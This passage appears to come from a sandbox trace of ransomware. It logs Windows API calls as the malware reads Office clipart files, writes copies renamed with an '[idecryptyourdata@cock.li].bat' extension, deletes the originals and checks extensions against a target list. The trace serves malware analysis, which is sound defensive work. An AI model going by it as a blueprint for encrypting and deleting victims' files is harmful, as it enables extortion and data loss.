hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.116] SetEndOfFile (hFile=0x37c) returned 1 [0197.117] CloseHandle (hObject=0x37c) returned 1 [0197.117] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.117] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153518.wmf")) returned 1 [0197.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF") returned 68 [0197.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF") returned 68 [0197.118] lstrlenW (lpString=".doc") returned 4 [0197.118] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.118] lstrlenW (lpString=".docx") returned 5 [0197.118] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0197.118] lstrlenW (lpString=".pdf") returned 4 [0197.118] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.118] lstrlenW (lpString=".xls") returned 4 [0197.118] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.118] lstrlenW (lpString=".xlsx") returned 5 [0197.118] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0197.118] lstrlenW (lpString=".ppt") returned 4 [0197.118] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF") returned 68 [0197.118] lstrlenW (lpString=".zip") returned 4 [0197.118] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.118] lstrlenW (lpString=".rar") returned 4 [0197.118] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.118] lstrlenW (lpString=".bz2") returned 4 [0197.118] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.118] lstrlenW (lpString=".7z") returned 3 [0197.118] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF") returned 68 [0197.119] lstrlenW (lpString=".dbf") returned 4 [0197.119] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF") returned 68 [0197.119] lstrlenW (lpString=".1cd") returned 4 [0197.119] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF") returned 68 [0197.119] lstrlenW (lpString=".jpg") returned 4 [0197.119] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.119] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.119] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.119] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0156537.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0197.120] GetLastError () returned 0x0 [0197.120] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x560, lpOverlapped=0x0) returned 1 [0197.121] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x570, lpOverlapped=0x0) returned 1 [0197.122] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.122] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.122] SetEndOfFile (hFile=0x340) returned 1 [0197.122] CloseHandle (hObject=0x340) returned 1 [0197.122] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.123] SetEndOfFile (hFile=0x37c) returned 1 [0197.123] CloseHandle (hObject=0x37c) returned 1 [0197.123] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.124] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0156537.wmf")) returned 1 [0197.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF") returned 68 [0197.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF") returned 68 [0197.124] lstrlenW (lpString=".doc") returned 4 [0197.124] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.124] lstrlenW (lpString=".docx") returned 5 [0197.124] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0197.124] lstrlenW (lpString=".pdf") returned 4 [0197.124] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.124] lstrlenW (lpString=".xls") returned 4 [0197.124] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.124] lstrlenW (lpString=".xlsx") returned 5 [0197.125] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0197.125] lstrlenW (lpString=".ppt") returned 4 [0197.125] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF") returned 68 [0197.125] lstrlenW (lpString=".zip") returned 4 [0197.125] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.125] lstrlenW (lpString=".rar") returned 4 [0197.125] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.125] lstrlenW (lpString=".bz2") returned 4 [0197.125] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.125] lstrlenW (lpString=".7z") returned 3 [0197.125] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF") returned 68 [0197.125] lstrlenW (lpString=".dbf") returned 4 [0197.125] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF") returned 68 [0197.125] lstrlenW (lpString=".1cd") returned 4 [0197.125] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF") returned 68 [0197.125] lstrlenW (lpString=".jpg") returned 4 [0197.125] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.126] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.126] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157167.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0197.126] GetLastError () returned 0x0 [0197.126] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0xb66e, lpOverlapped=0x0) returned 1 [0197.129] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xb670, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xb670, lpOverlapped=0x0) returned 1 [0197.131] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.131] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.131] SetEndOfFile (hFile=0x340) returned 1 [0197.131] CloseHandle (hObject=0x340) returned 1 [0197.131] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.131] SetEndOfFile (hFile=0x37c) returned 1 [0197.132] CloseHandle (hObject=0x37c) returned 1 [0197.132] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.132] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157167.wmf")) returned 1 [0197.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF") returned 68 [0197.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF") returned 68 [0197.133] lstrlenW (lpString=".doc") returned 4 [0197.133] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.133] lstrlenW (lpString=".docx") returned 5 [0197.133] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0197.133] lstrlenW (lpString=".pdf") returned 4 [0197.133] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.133] lstrlenW (lpString=".xls") returned 4 [0197.133] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.133] lstrlenW (lpString=".xlsx") returned 5 [0197.134] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0197.134] lstrlenW (lpString=".ppt") returned 4 [0197.134] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF") returned 68 [0197.134] lstrlenW (lpString=".zip") returned 4 [0197.134] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.134] lstrlenW (lpString=".rar") returned 4 [0197.134] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.134] lstrlenW (lpString=".bz2") returned 4 [0197.134] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.134] lstrlenW (lpString=".7z") returned 3 [0197.134] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF") returned 68 [0197.134] lstrlenW (lpString=".dbf") returned 4 [0197.134] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF") returned 68 [0197.134] lstrlenW (lpString=".1cd") returned 4 [0197.134] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF") returned 68 [0197.134] lstrlenW (lpString=".jpg") returned 4 [0197.134] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.135] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.135] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157177.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0197.135] GetLastError () returned 0x0 [0197.135] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x54d4, lpOverlapped=0x0) returned 1 [0197.137] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x54e0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x54e0, lpOverlapped=0x0) returned 1 [0197.139] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.139] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.139] SetEndOfFile (hFile=0x340) returned 1 [0197.139] CloseHandle (hObject=0x340) returned 1 [0197.139] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.139] SetEndOfFile (hFile=0x37c) returned 1 [0197.140] CloseHandle (hObject=0x37c) returned 1 [0197.140] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.140] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157177.wmf")) returned 1 [0197.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF") returned 68 [0197.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF") returned 68 [0197.141] lstrlenW (lpString=".doc") returned 4 [0197.141] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.141] lstrlenW (lpString=".docx") returned 5 [0197.141] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0197.141] lstrlenW (lpString=".pdf") returned 4 [0197.141] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.141] lstrlenW (lpString=".xls") returned 4 [0197.141] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.141] lstrlenW (lpString=".xlsx") returned 5 [0197.141] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0197.141] lstrlenW (lpString=".ppt") returned 4 [0197.141] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF") returned 68 [0197.141] lstrlenW (lpString=".zip") returned 4 [0197.141] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.141] lstrlenW (lpString=".rar") returned 4 [0197.141] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.141] lstrlenW (lpString=".bz2") returned 4 [0197.141] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.141] lstrlenW (lpString=".7z") returned 3 [0197.141] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF") returned 68 [0197.141] lstrlenW (lpString=".dbf") returned 4 [0197.142] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF") returned 68 [0197.142] lstrlenW (lpString=".1cd") returned 4 [0197.142] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF") returned 68 [0197.142] lstrlenW (lpString=".jpg") returned 4 [0197.142] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.142] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.142] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157191.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0197.143] GetLastError () returned 0x0 [0197.143] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x45f8, lpOverlapped=0x0) returned 1 [0197.352] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x4600, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x4600, lpOverlapped=0x0) returned 1 [0197.354] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.354] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.354] SetEndOfFile (hFile=0x340) returned 1 [0197.354] CloseHandle (hObject=0x340) returned 1 [0197.354] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.354] SetEndOfFile (hFile=0x37c) returned 1 [0197.355] CloseHandle (hObject=0x37c) returned 1 [0197.355] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.355] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157191.wmf")) returned 1 [0197.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF") returned 68 [0197.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF") returned 68 [0197.356] lstrlenW (lpString=".doc") returned 4 [0197.356] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.356] lstrlenW (lpString=".docx") returned 5 [0197.356] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0197.356] lstrlenW (lpString=".pdf") returned 4 [0197.356] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.356] lstrlenW (lpString=".xls") returned 4 [0197.357] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.357] lstrlenW (lpString=".xlsx") returned 5 [0197.357] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0197.357] lstrlenW (lpString=".ppt") returned 4 [0197.357] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF") returned 68 [0197.357] lstrlenW (lpString=".zip") returned 4 [0197.357] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.357] lstrlenW (lpString=".rar") returned 4 [0197.357] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.357] lstrlenW (lpString=".bz2") returned 4 [0197.357] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.357] lstrlenW (lpString=".7z") returned 3 [0197.357] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF") returned 68 [0197.357] lstrlenW (lpString=".dbf") returned 4 [0197.357] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF") returned 68 [0197.357] lstrlenW (lpString=".1cd") returned 4 [0197.357] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF") returned 68 [0197.357] lstrlenW (lpString=".jpg") returned 4 [0197.357] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.358] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.358] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.358] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174952.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0197.359] GetLastError () returned 0x0 [0197.359] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x6196, lpOverlapped=0x0) returned 1 [0197.432] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x61a0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x61a0, lpOverlapped=0x0) returned 1 [0197.433] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.433] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.434] SetEndOfFile (hFile=0x340) returned 1 [0197.434] CloseHandle (hObject=0x340) returned 1 [0197.434] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.434] SetEndOfFile (hFile=0x37c) returned 1 [0197.435] CloseHandle (hObject=0x37c) returned 1 [0197.435] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.435] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174952.jpg")) returned 1 [0197.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG") returned 68 [0197.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG") returned 68 [0197.436] lstrlenW (lpString=".doc") returned 4 [0197.436] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0197.436] lstrlenW (lpString=".docx") returned 5 [0197.436] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1 [0197.436] lstrlenW (lpString=".pdf") returned 4 [0197.436] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0197.436] lstrlenW (lpString=".xls") returned 4 [0197.436] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0197.436] lstrlenW (lpString=".xlsx") returned 5 [0197.436] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1 [0197.436] lstrlenW (lpString=".ppt") returned 4 [0197.436] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0197.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG") returned 68 [0197.436] lstrlenW (lpString=".zip") returned 4 [0197.437] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0197.437] lstrlenW (lpString=".rar") returned 4 [0197.437] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0197.437] lstrlenW (lpString=".bz2") returned 4 [0197.437] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0197.437] lstrlenW (lpString=".7z") returned 3 [0197.437] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0197.437] 